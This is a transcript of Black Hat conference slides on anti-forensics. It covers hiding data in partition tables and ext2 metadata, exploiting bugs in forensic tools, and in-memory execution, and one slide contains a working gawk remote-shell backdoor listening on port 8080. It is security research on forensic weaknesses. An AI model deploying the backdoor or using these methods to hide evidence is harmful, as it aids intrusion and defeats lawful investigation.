the art of defiling - black hat · 2015-05-28 · the art of defiling defeating forensic analysis...
TRANSCRIPT
![Page 1: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/1.jpg)
The Art of Defiling
Defeating Forensic Analysis
the grugq
![Page 2: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/2.jpg)
Overview
Introduction
Forensics
Anti-Forensics
Anti-Forensics in Action
Q & A
![Page 3: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/3.jpg)
Introduction
Who the grugq
What Break forensic tools
Why Under researched and critical
![Page 4: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/4.jpg)
Forensics
Digital Forensic Investigations:Lightening Tour
![Page 5: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/5.jpg)
Forensics Overview
Introduction Digital forensics process
Acquisition Preservation Identification Evaluation Presentation
Conclusion
![Page 6: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/6.jpg)
Introduction
Scientific method
Analysis vs. investigation
Evidence Inculpatory
Exculpatory
Tampering
Chain of evidence
![Page 7: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/7.jpg)
Forensics Outline
Data Capture Get everything which might contain evidence
Data Analysis Search for evidence
Data Presentation Present evidence
![Page 8: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/8.jpg)
Forensic Process Overview
Acquisition
Preservation
Identification
Evaluation
Presentation
![Page 9: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/9.jpg)
Acquisition
Capture data for later analysis
Volatile data Memory
Network traffic
Non-Volatile data File system contents
Start the chain of evidence documentation
![Page 10: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/10.jpg)
Preservation
Bit level copy
Hash sums
Labeling
Cont. chain of evidence documentation
Start analysis documentation
![Page 11: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/11.jpg)
Identification Graphic
BitstreamEvidence
Filesystems
Files
![Page 12: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/12.jpg)
Identification
Bit level copy as input data Parse data for file system representation Extract all available data
Deleted content OS files
logs
User files
Update analysis documentation
![Page 13: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/13.jpg)
Evaluation
Examine data
Determine relevance to case
If more data is required, go to Identification
Finish analysis documentation
![Page 14: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/14.jpg)
Presentation
Present all evidence Employment tribunal
Court
Conclude chain of evidence documentation
![Page 15: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/15.jpg)
Conclusion
Forensics is a procedural, scientific process Acquisition
Preservation
Identification
Evaluation
Presentation
Reproducible results
![Page 16: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/16.jpg)
Anti-Forensics
Reducing the Quantity andQuality of Forensic Evidence
(since 1999)
![Page 17: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/17.jpg)
Overview
Introduction
Digital forensics: the problems
Attacking the forensic process
Anti-Forensic Strategies
![Page 18: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/18.jpg)
Anti-Forensic Introduction
Mitigate the effectiveness of forensicinvestigation
Who uses it Hackers
Dodgy employees
al Qaeda
Pedophiles
![Page 19: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/19.jpg)
Digital Forensics: The Problems
Forensic analysts have issues Frequently short on time
Generally short on skills
Almost always slaves to their tools
Forensic tools have bugs Traditional bugs, e.g. buffer overflows, format
strings
File system implementation bugs
![Page 20: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/20.jpg)
Attacking the Forensic Process
Forensics as security technology
As vulnerable as other technologies Less scrutinized than other technologies
Attacks for each stage of forensic process
![Page 21: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/21.jpg)
Countering Data Capture
Acquisition Don’t arouse suspicion
Destroy hardware
Eradicate the data
Preservation Nothing I can think of that’s useful
![Page 22: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/22.jpg)
Countering Data Analysis
Identification Hide the evidence
Don’t leave any evidence
Evaluation Encrypt everything
Proprietary data formats
![Page 23: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/23.jpg)
Countering Data Presentation
Presentation Trojan defense
“Something” other than the computer owner did it
Invisible Trojan Defense The Wookie defense of Information Security
Confuse judge w/ “doubts”
Most trials still rely on a confession “I’m a salesman. My job is to sell people jail
sentences.”
![Page 24: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/24.jpg)
Anti-Forensic Strategies
The Anti-Forensic Principle: Data isevidence Prevent it from being found
Data Destruction
Data Hiding
Data Contraception
![Page 25: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/25.jpg)
Data Destruction
More difficult than it sounds File content File system meta data
Completely remove all relevant data Alter file system meta-data
Time stamps
Restore file system to pre-file state File system is not a secure, trusted, log
![Page 26: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/26.jpg)
Data Hiding – Requirements
Covert
Exploit bugs in forensic tools Temporarily – ergo, insecure long term storage
Reliable Data must not disappear
Secure Can't be accessed without correct tools
Encrypted
![Page 27: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/27.jpg)
Data Hiding Methodology
“Ladies and Gentlemen, I'm hereto talk about FISTing”
![Page 28: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/28.jpg)
Filesystem Insertion & SubversionTechnique
FISTing is inserting data into places itdoesn't belong
Data storage in meta-data files e.g. Journals, directory files, OLE2 files, etc.
Modifying meta-data is dangerous! Obey the FSCK!
What holes can you FIST?
![Page 29: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/29.jpg)
Holes for FISTing
FS Specification
fsck
forensics kernel
FIST here
![Page 30: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/30.jpg)
FISTing wrap up
Powerful methodology for data hiding
Effective against most forensic analysis
FISTing implementations will be exploredlater
![Page 31: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/31.jpg)
Data Contraception
No data: is good data
Two routes to practice “safe hacking” Reduce the quantity of data
Minimize disk activity
Evidence prophylactics
Reduce the quality of data Common tools rather than custom ones
![Page 32: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/32.jpg)
Reducing quantity
Non-evidentiary rootkits / backdoors In memory patching
In memory execution Scripting – stdin rather than file
Binaries – userland exec()
![Page 33: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/33.jpg)
Reducing quantity cont.
Evidence prophylactics insulate code fromthe OS
IUDs provide access to an address space Inter/Intra Userland Device
Process puppeteering Immunitysec’s Mosdef
CORE-SDI’s Impact
![Page 34: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/34.jpg)
Reducing quality
Common tools reveal little about intent orpurpose
Tools built from shell scripts
![Page 35: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/35.jpg)
Anti-Forensics in Action
File System Attacks Gone Wild!Live! Uncensored!
![Page 36: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/36.jpg)
Overview
Below the file system Partition table attacks
Within the file system Ext2fs attacks
Beyond the file system In memory execution
![Page 37: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/37.jpg)
Deep Disking
It came from below the filesystem!
![Page 38: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/38.jpg)
Deep Disking: Introduction
Partition table is below FS layer
Partition table organizes the hard disk into“partitions” Partitions are not in hardware
Only has meaning for software which cares Operating System
Disk editors
Forensic tools
![Page 39: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/39.jpg)
Deep Disking: Anti-Forensics
Pros
File system neutral
Attacks on forensic toolintegrity Usually taken for
granted
Cons
Exploitation is complexand dangerous Not useful for post OS
install attacks
High chance of dataloss
Can break operatingsystems
![Page 40: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/40.jpg)
Partition Table Layout
Partition table is comprised of one or morepartition vectors
A partition vector contains up to fourpartition table entries
First partition vector (primary partition table)may point to an extended partition
Extended partition contains a linked list ofpartition vectors
![Page 41: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/41.jpg)
Partition Table Layout Graphic
![Page 42: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/42.jpg)
Structures: partition table entry
struct partion_entry { unsigned char active; /* boot active partition? */ unsigned char start_head;/* start head for the partition XXX */ unsigned char start_sec; /* starting sector for the partition XXX */ unsigned char start_cyl; /* start cylinder for the partition XXX */ unsigned char type; /* partition table type */ unsigned char end_head; /* end head for partition XXX */ unsigned char end_sec; /* ending sector for partition XXX */ unsigned char end_cyl; /* ending cylinder for partition XXX */ unsigned int first_sec; /* first sector of the partition */ unsigned int num_sec; /* number of sectors in the partition */} __attribute__((packed));
![Page 43: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/43.jpg)
Partition Table: Attacks
Excessive extended partitions
Extra “extended” partition vector entries
Errors in table alignment
Partition table FISTing
![Page 44: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/44.jpg)
Excessive Extended Partition Vectors
Assumption: limit to number of extendedpartition vectors in the linked list
Technique: create more than n
Cause error conditions Possibly buffer overflows
Definitely abort
![Page 45: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/45.jpg)
Extra Extended Partition Tables
Assumption: only one extended partitiontable entry per extended partition vector
Technique: multiple extended partition tableentries
Can create disk space invisible to Disk editor Forensic tools
Windows and Linux can see these entries
![Page 46: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/46.jpg)
Errors in Table Alignment
Assumption: sum of all partition entries isequivalent to disk space size
Technique: misalignment of partition tableentries Cause buffer overflows / underflows
Technique: restorable logical partition Restore for use, delete when done Popular technique with many pedophiles
![Page 47: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/47.jpg)
Partition Table FISTing
Partition start is offset 64 sectors
Extended partition tables contain 446 bytesof padding
Just under 32k per extended partitionvector
Not a high capacity data store
![Page 48: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/48.jpg)
File System FISTing
How to destroy your file systemin just a few easy steps
![Page 49: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/49.jpg)
File System Components
File system layer Meta data for the OS
Data content layer Data storage units
Meta data layer Organize data units into files
Name layer Human addressable interface for files
![Page 50: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/50.jpg)
Unix file system
File system layer Super block
Data content layer Block
Meta data layer Inode
Name layer Directory file
![Page 51: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/51.jpg)
Unix inodes
File meta data Reference counts, owner, group, permissions Time stamps: modification, access, change
List of data blocks Flexible extended array
Direct blocks Indirect blocks Doubly indirect block Trebly indirect block
![Page 52: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/52.jpg)
Unix inodes: graphic
inode metadatasize, owner, mode etc.
Data blocks
block pointers
indirectblock
.
.
.
.
![Page 53: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/53.jpg)
Unix directory files
Link inode numbers to filenames
struct dirent {int inode;short rec_len;short name_len;char name[];
}
0 deleted 16
12 somefile 32
13 lamefile 16
123 lastfile 128
11 lost & found 16
13 lame file 16
12 somefile 32
123 lastfile 128
0 deleted 16
![Page 54: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/54.jpg)
Unix file system attacks
Rune fs Bad blocks inode
Waffen fs Spoofed journal file
KY fs Null directory entires
Data mule fs Reserved space
![Page 55: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/55.jpg)
Rune FS
Bad Blocks inode 1, root ('/') inode 2
Exploits bad bounds checking in TCTif (inode < ROOT_INODE || inode > LAST_INO)
return BAD_INODE;
Implemented as a regular file, massivedata storage
![Page 56: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/56.jpg)
Waffen FS
Adds an ext3 journal to an ext2 FS Kernel determines FS type via /etc/fstab e2fsck determines FS type via sb flags
Exploits lame forensic tools Only implement 1 FS type (ext2)
Usually 32Mb storage (average journal sz)
![Page 57: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/57.jpg)
KY FS
Data storage in directory files
Utilizes null directory entriesdirent {
inode = 0;
rec_len = BLOCK_SIZE;
name_len = 0;
name[] = …
}
Almost unlimited space
![Page 58: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/58.jpg)
KY FS details
Kernel + fsck pseudo code:for (dp = dir; dp < dir_end; dp += dp->rec_len)
if (dp->inode == 0) /* is deleted? */continue;
Forensic tools pseudo code:if (dp->inode == 0 && dp->namelen > 0)
/* recover deleted file name */
![Page 59: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/59.jpg)
Data Mule FS
Storage within file system meta-datastructures Reserved space
Padding
Remains untouched by kernel and fsck
Ignored by forensic tools Only interested in data and meta-data
![Page 60: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/60.jpg)
Data Mule FS -- space
Super block: 759 bytes
Group descriptor: 14 bytes
Inode: 10 bytes
1G ext2 file system, 4k blocks (default) Groups: 8
Super blocks: 4 (3036 bytes)
Group descriptors: 64 (896 bytes)
Inodes: 122112 (1221120 bytes)
Total: 1225052 bytes =~ 1196k =~ 1M
![Page 61: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/61.jpg)
Outer Bounds
Beyond disk level based attacks
![Page 62: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/62.jpg)
Evidence prophylactics
In process execution Canvas
MOSDEF
CORE Impact Syscall proxying
In memory execution rexec
ftrans
![Page 63: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/63.jpg)
Common tools
GDB based process puppeteering
Shell scripts FS state conservation tools
Log cleaners
Backdoors
![Page 64: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/64.jpg)
Gawk remote access shell#!/usr/bin/gawk -f
BEGIN {
Port = 8080 # Port to listen on
Prompt = "bkd> " # Prompt to display
Service = "/inet/tcp/" Port "/0/0" # Open a listening port
while (1) {
do {
printf Prompt |& Service # Display the prompt
Service |& getline cmd # Read in the command
if (cmd) {
while ((cmd |& getline) > 0) # Execute the command and read response
print $0 |& Service # Return the response
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
}
![Page 65: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/65.jpg)
Conclusion
Forensics is as vulnerable as other securitytechnologies
File systems are not an accurate log ofsystem activity
Your file system is 0wned
![Page 66: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/66.jpg)
Q & A